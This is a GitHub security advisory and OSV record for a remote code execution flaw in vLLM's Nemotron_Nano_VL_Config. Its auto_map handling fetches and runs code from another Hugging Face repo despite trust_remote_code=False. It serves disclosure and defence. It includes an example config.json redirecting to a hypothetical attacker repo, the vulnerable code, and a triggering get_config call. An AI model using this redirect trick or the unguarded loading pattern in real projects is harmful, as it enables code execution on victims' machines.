GHSA-8fr4-5q9j-m8gm
Vulnerability from GitHub
Published: 2025-12-02 17:34
Modified: 2025-12-02 17:34
Summary: vLLM vulnerable to remote code execution via transformers_utils/get_config
Details

Summary

vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host.
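
For illustration, the frontend repo's config.json could take the following shape (the repo, module, and class names here are hypothetical): the auto_map value redirects the loader to a separate backend repo, which is where the malicious Python actually lives.

```json
{
  "model_type": "Llama_Nemotron_Nano_VL",
  "vision_config": {
    "auto_map": {
      "AutoConfig": "attacker/backend-repo--configuration_evil.EvilConfig"
    }
  }
}
```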

Details

The vulnerable code resolves and instantiates classes from auto_map entries without checking whether those entries point to a different repo or whether remote code execution is allowed.

```python
class Nemotron_Nano_VL_Config(PretrainedConfig):
    model_type = 'Llama_Nemotron_Nano_VL'

    # Excerpt: vision_config is the attacker-controlled dict parsed from the
    # model's config.json (the real __init__ accepts further parameters).
    def __init__(self, vision_config=None, **kwargs):
        super().__init__(**kwargs)

        if vision_config is not None:
            assert "auto_map" in vision_config and "AutoConfig" in vision_config["auto_map"]
            # <-- vulnerable dynamic resolution + instantiation happens here
            vision_auto_config = get_class_from_dynamic_module(*vision_config["auto_map"]["AutoConfig"].split("--")[::-1])
            self.vision_config = vision_auto_config(**vision_config)
        else:
            self.vision_config = PretrainedConfig()
```
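
The repo--module.ClassName syntax in the auto_map value is what enables the cross-repo redirect: everything before the -- names the repository whose Python the loader will fetch, and split("--")[::-1] reverses the pair into the (class_reference, repo_id) argument order that get_class_from_dynamic_module expects. A quick illustration, using the hypothetical names from above:

```python
# Hypothetical auto_map value: the text before "--" names the repo whose
# Python the loader will download; the text after names module.ClassName.
ref = "attacker/backend-repo--configuration_evil.EvilConfig"

class_reference, repo_id = ref.split("--")[::-1]
print(class_reference)  # configuration_evil.EvilConfig
print(repo_id)          # attacker/backend-repo

# The vulnerable line is therefore equivalent to:
#   get_class_from_dynamic_module("configuration_evil.EvilConfig",
#                                 "attacker/backend-repo")
# which downloads configuration_evil.py from the backend repo and imports
# it; any module-level code in that file runs immediately.
```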

get_class_from_dynamic_module(...) fetches and imports code from the Hugging Face repo specified in the mapping, and trust_remote_code is not enforced on this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the trust_remote_code guard.
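
A minimal sketch of the guard this path is missing, assuming a helper of this shape (the actual change is in the fix PR linked below):

```python
from transformers.dynamic_module_utils import get_class_from_dynamic_module


def resolve_vision_auto_config(vision_config: dict, trust_remote_code: bool):
    """Resolve an auto_map AutoConfig entry, honoring trust_remote_code."""
    ref = vision_config["auto_map"]["AutoConfig"]
    if not trust_remote_code:
        # Dynamic resolution downloads and imports arbitrary Python from
        # whatever repo `ref` names, so it must be gated on explicit opt-in.
        raise ValueError(
            f"config requests remote code ({ref!r}); "
            "pass trust_remote_code=True to allow it"
        )
    return get_class_from_dynamic_module(*ref.split("--")[::-1])
```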

Impact

This is a critical vulnerability because it breaks the documented trust_remote_code safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses vllm’s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.
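
Concretely, on an affected version a call like the following (model name hypothetical) would pull in and run the backend repo's Python despite the explicit opt-out:

```python
from vllm.transformers_utils.config import get_config

# vllm < 0.11.1: if attacker/frontend-repo's config.json carries an auto_map
# entry pointing at a malicious backend repo, that repo's code executes here
# even though remote code is explicitly disallowed.
config = get_config("attacker/frontend-repo", trust_remote_code=False)
```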

Fixes

  • https://github.com/vllm-project/vllm/pull/28126 (fix commit: https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86)
  • Upgrade to vllm 0.11.1 or later, the first release containing the fix.
Full advisory record (OSV format):

```json
{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-66448"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-02T17:34:16Z",
    "nvd_published_at": "2025-12-01T23:15:54Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`vllm` has a critical remote code execution vector in a config class named `Nemotron_Nano_VL_Config`. When `vllm` loads a model config that contains an `auto_map` entry, the config class resolves that mapping with `get_class_from_dynamic_module(...)` and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the `auto_map` string. Crucially, this happens even when the caller explicitly sets `trust_remote_code=False` in `vllm.transformers_utils.config.get_config`. In practice, an attacker can publish a benign-looking frontend repo whose `config.json` points via `auto_map` to a separate malicious backend repo; loading the frontend will silently run the backend\u2019s code on the victim host.\n\n### Details\n\nThe vulnerable code resolves and instantiates classes from `auto_map` entries without checking whether those entries point to a different repo or whether remote code execution is allowed.\n\n```python\nclass Nemotron_Nano_VL_Config(PretrainedConfig):\n    model_type = \u0027Llama_Nemotron_Nano_VL\u0027\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n\n        if vision_config is not None:\n            assert \"auto_map\" in vision_config and \"AutoConfig\" in vision_config[\"auto_map\"]\n            # \u003c-- vulnerable dynamic resolution + instantiation happens here\n            vision_auto_config = get_class_from_dynamic_module(*vision_config[\"auto_map\"][\"AutoConfig\"].split(\"--\")[::-1])\n            self.vision_config = vision_auto_config(**vision_config)\n        else:\n            self.vision_config = PretrainedConfig()\n```\n\n`get_class_from_dynamic_module(...)` is capable of fetching and importing code from the Hugging Face repo specified in the mapping. `trust_remote_code` is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the `trust_remote_code` guard.\n\n### Impact\n\nThis is a critical vulnerability because it breaks the documented `trust_remote_code` safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses `vllm`\u2019s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.\n\n### Fixes\n\n* https://github.com/vllm-project/vllm/pull/28126",
  "id": "GHSA-8fr4-5q9j-m8gm",
  "modified": "2025-12-02T17:34:16Z",
  "published": "2025-12-02T17:34:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66448"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/28126"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM vulnerable to remote code execution via transformers_utils/get_config"
}
```

